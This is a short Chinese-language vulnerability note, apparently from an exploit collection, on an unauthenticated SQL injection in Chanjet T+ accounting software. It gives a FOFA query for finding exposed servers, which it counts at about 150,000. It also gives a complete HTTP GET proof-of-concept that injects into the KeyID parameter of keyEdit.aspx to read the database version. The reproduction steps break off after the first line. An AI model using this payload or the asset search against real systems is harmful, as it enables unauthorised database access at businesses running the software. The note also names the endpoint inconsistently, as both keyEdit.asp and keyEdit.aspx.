漏洞描述:
該漏洞是由於暢捷通T的/tplus/UFAQD/keyEdit.asp介面處未對使用者的輸入進行過濾和校驗,未經身份驗證的攻擊者可以利用SQL隱碼攻擊漏洞獲取資料庫中的資訊
fofa: app="暢捷通-TPlus"
POC:
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xxx.xxx.xxx
Accept-Charset: utf-8
漏洞復現:
在fofa中搜尋資產,有15萬條資產
對目標資產構建語句